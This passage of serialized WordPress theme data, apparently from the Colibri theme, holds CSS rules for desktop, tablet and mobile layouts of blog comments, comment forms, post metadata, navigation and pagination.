15px;\n}\n\";s:6:\"tablet\";s:47:\"#colibri .style-100 {\n padding-bottom: 5px;\n}\n\";s:6:\"mobile\";s:47:\"#colibri .style-100 {\n padding-bottom: 5px;\n}\n\";}i:101;a:3:{s:7:\"desktop\";s:3602:\"#colibri .style-101 .blog-post-comments {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 15px;\n}\n#colibri .style-101 .comment.even {\n background-color: #FFFFFF;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n padding-top: 12px;\n padding-right: 12px;\n padding-bottom: 12px;\n padding-left: 12px;\n}\n#colibri .style-101 .comment.odd {\n background-color: rgba(166, 220, 244, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n padding-top: 12px;\n padding-right: 12px;\n padding-bottom: 12px;\n padding-left: 12px;\n}\n#colibri .style-101 .comments-title {\n font-family: Open Sans;\n font-weight: 600;\n text-decoration: none;\n font-size: 1.25em;\n color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-meta {\n color: rgb(153, 153, 153);\n margin-bottom: 16px;\n}\n#colibri .style-101 .comment-author img {\n width: 30px ;\n height: 30px;\n background-color: unset;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-101 .comment-author .url {\n font-weight: 600;\n font-style: normal;\n text-decoration: none;\n color: rgb(51, 51, 51);\n background-color: unset;\n background-image: none;\n margin-left: 5px;\n}\n#colibri .style-101 .comment-metadata {\n text-decoration: none;\n font-size: 14px;\n color: rgb(153, 153, 153);\n background-color: unset;\n background-image: none;\n transition-duration: 0.5s;\n}\n#colibri .style-101 .comment-metadata:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-metadata:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-content {\n text-decoration: none;\n font-size: 16px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-101 .comment-content p {\n color: rgb(102, 102, 102);\n}\n#colibri .style-101 .comment-content a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a {\n margin-bottom: 10px;\n font-weight: 400;\n text-transform: lowercase;\n font-size: 1em;\n line-height: 1.5;\n color: #03a9f4;\n}\n#colibri .style-101 .comment-body .reply a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .children {\n margin-left: 12px;\n}\n#colibri .style-101 .comments-disabled {\n text-align: center;\n margin-bottom: 0px;\n text-decoration: none;\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:102;a:3:{s:7:\"desktop\";s:4044:\"#colibri .comment-respond {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 15px;\n}\n#colibri .comment-respond .comment-reply-title {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.25em;\n color: rgb(0, 0, 0);\n}\n#colibri .comment-respond label {\n color: rgb(102, 102, 102);\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .comment-respond input:not([type=\"submit\"]),#colibri .comment-respond textarea {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(102, 102, 102);\n background-color: rgba(0,0,0,0);\n background-image: none;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"] {\n background-color: #03a9f4;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #FFFFFF;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:active {\n background-color: #03a9f4;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #FFFFFF;\n}\n#colibri .comment-respond .comment-notes {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:103;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-103 {\n margin-top: -30px;\n}\n\";s:6:\"tablet\";s:45:\"#colibri .style-103 {\n margin-top: -15px;\n}\n\";s:6:\"mobile\";s:0:\"\";}i:104;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-104 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:105;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:106;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:107;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:108;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:109;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:110;a:3:{s:7:\"desktop\";s:542:\"#colibri .style-110 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:111;a:3:{s:7:\"desktop\";s:269:\"#colibri .style-111 {\n background-color: rgba(255,255,255,0);\n background-image: none;\n text-align: center;\n margin-bottom: 0px;\n}\n#colibri .style-111 .colibri-post-thumbnail-shortcode img {\n height: 300px;\n object-position: center center;\n object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:112;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-112 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:113;a:3:{s:7:\"desktop\";s:543:\".style-113 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-113 {\n text-align: left;\n height: auto;\n min-height: unset;\n border-top-width: 0px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-113 {\n text-align: center;\n}\n\";}i:114;a:3:{s:7:\"desktop\";s:531:\"#colibri .style-114 {\n margin-bottom: 0px;\n}\n#colibri .style-114 a {\n text-decoration: none;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-114 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-114 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-114 .metadata-prefix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-114 .metadata-suffix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-114 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:115;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-115 a {\n text-decoration: none;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-115 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-115 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-115 .metadata-prefix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-115 .metadata-suffix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-115 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:116;a:3:{s:7:\"desktop\";s:198:\"#colibri .style-116 h1,#colibri .style-116 h2,#colibri .style-116 h3,#colibri .style-116 h4,#colibri .style-116 h5,#colibri .style-116 h6 {\n margin-bottom: 0px;\n transition-duration: 0.5s;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:117;a:3:{s:7:\"desktop\";s:75:\"#colibri .style-117 .colibri-post-excerpt {\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:118;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:119;a:3:{s:7:\"desktop\";s:157:\".style-119 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-119 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:120;a:3:{s:7:\"desktop\";s:293:\"#colibri .style-120 a {\n text-decoration: none;\n color: #03a9f4;\n}\n#colibri .style-120 a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-120 a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-120 svg {\n width: 24px ;\n height: 24px;\n display: inline-block;\n margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:121;a:3:{s:7:\"desktop\";s:158:\".style-121 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-121 {\n text-align: right;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:122;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:123;a:3:{s:7:\"desktop\";s:800:\"#colibri .style-123-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n#colibri .style-123 {\n text-align: center;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n border-top-width: 2px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-style: none;\n}\n#colibri .style-123:hover,#colibri .style-123:focus {\n color: rgb(2, 110, 159);\n}\n#colibri .style-123:active .style-123-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:124;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-124 {\n border-top-width: 1px;\n border-top-color: rgb(224, 224, 224);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(224, 224, 224);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(224, 224, 224);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(224, 224, 224);\n border-left-style: solid;\n margin-top: 45px;\n margin-right: 30px;\n margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-124 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-124 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";}i:125;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-125 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:126;a:3:{s:7:\"desktop\";s:885:\"#colibri .style-126 .nav-links .prev-navigation a,#colibri .style-126 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:127;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-127 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:128;a:3:{s:7:\"desktop\";s:296:\"#colibri .style-128 .page-numbers.current {\n margin-right: 10px;\n color: #03a9f4;\n}\n#colibri .style-128 .page-numbers {\n margin-right: 10px;\n color: rgb(51, 51, 51);\n}\n#colibri .style-128 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-128 .page-numbers:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:129;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-129 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:130;a:3:{s:7:\"desktop\";s:913:\"#colibri .style-130 .nav-links .prev-navigation a,#colibri .style-130 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: rgb(0, 0, 0);\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 2px;\n border-right-color: rgb(0, 0, 0);\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: rgb(0, 0, 0);\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 2px;\n border-left-color: rgb(0, 0, 0);\n border-left-style: none;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:131;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:132;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:133;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-133 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:134;a:3:{s:7:\"desktop\";s:363:\"#colibri .style-134 p,#colibri .style-134 h1,#colibri .style-134 h2,#colibri .style-134 h3,#colibri .style-134 h4,#colibri .style-134 h5,#colibri .style-134 h6 {\n font-size: 10em;\n color: rgb(51, 51, 51);\n}\n#colibri .style-134 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:135;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:136;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:137;a:3:{s:7:\"desktop\";s:1300:\"#colibri .style-137-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 10px;\n}\n#colibri .style-137 {\n background-color: rgba(3, 169, 244, 0);\n background-image: none;\n font-family: Open Sans;\n font-weight: 400;\n text-transform: none;\n font-size: 16px;\n line-height: 1.5em;\n letter-spacing: 1px;\n color: #03a9f4;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: none;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n text-align: center;\n}\n#colibri .style-137:hover,#colibri .style-137:focus {\n background-color: rgba(2, 110, 159, 0);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-137:active .style-137-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 10px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:138;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:139;a:3:{s:7:\"desktop\";s:67:\"#colibri .style-139 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:140;a:3:{s:7:\"desktop\";s:540:\"#colibri .style-140 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:141;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-141 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:142;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-142 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:143;a:3:{s:7:\"desktop\";s:444:\"#colibri .style-143 a,#colibri .style-143 .colibri-post-category {\n margin-right: 10px;\n text-transform: lowercase;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-143 a:hover,#colibri .style-143 .colibri-post-category:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-143 a:hover,#colibri .style-143 .colibri-post-category:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-143 .categories-prefix {\n margin-right: 16px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:144;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-144 h1,#colibri .style-144 h2,#colibri .style-144 h3,#colibri .style-144 h4,#colibri .style-144 h5,#colibri .style-144 h6 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:145;a:3:{s:7:\"desktop\";s:583:\"#colibri .style-145 a {\n text-decoration: none;\n text-transform: lowercase;\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-145 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-145 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-145 .metadata-prefix {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-145 .metadata-suffix {\n font-size: 14px;\n color: rgb(153, 153, 153);\n}\n#colibri .style-145 svg {\n width: 24px ;\n height: 24px;\n margin-right: 5px;\n display: none;\n}\n#colibri .style-145 .meta-separator {\n color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:146;a:3:{s:7:\"desktop\";s:75:\"#colibri .style-146 .colibri-post-excerpt {\n color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:147;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:148;a:3:{s:7:\"desktop\";s:562:\"#colibri .style-148-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n#colibri .style-148 {\n text-align: center;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n border-top-style: none;\n border-right-style: none;\n border-bottom-style: none;\n border-left-style: none;\n}\n#colibri .style-148:hover,#colibri .style-148:focus {\n color: rgb(2, 110, 159);\n}\n#colibri .style-148:active .style-148-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:149;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-149 {\n border-top-width: 1px;\n border-top-color: rgb(224, 224, 224);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(224, 224, 224);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(224, 224, 224);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(224, 224, 224);\n border-left-style: solid;\n margin-top: 45px;\n margin-right: 30px;\n margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-149 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-149 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";}i:150;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-150 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:151;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-151 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:152;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-152 .nav-links .prev-navigation a,#colibri .style-152 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 10px;\n border-top-right-radius: 10px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 10px;\n border-bottom-right-radius: 10px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:153;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-153 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:154;a:3:{s:7:\"desktop\";s:371:\"#colibri .style-154 .page-numbers.current {\n margin-right: 10px;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n}\n#colibri .style-154 .page-numbers {\n margin-right: 10px;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(0, 0, 0);\n}\n#colibri .style-154 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-154 .page-numbers:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:155;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-155 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:156;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-156 .nav-links .prev-navigation a,#colibri .style-156 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(51, 51, 51);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 10px;\n border-top-right-radius: 10px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 10px;\n border-bottom-right-radius: 10px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n color: 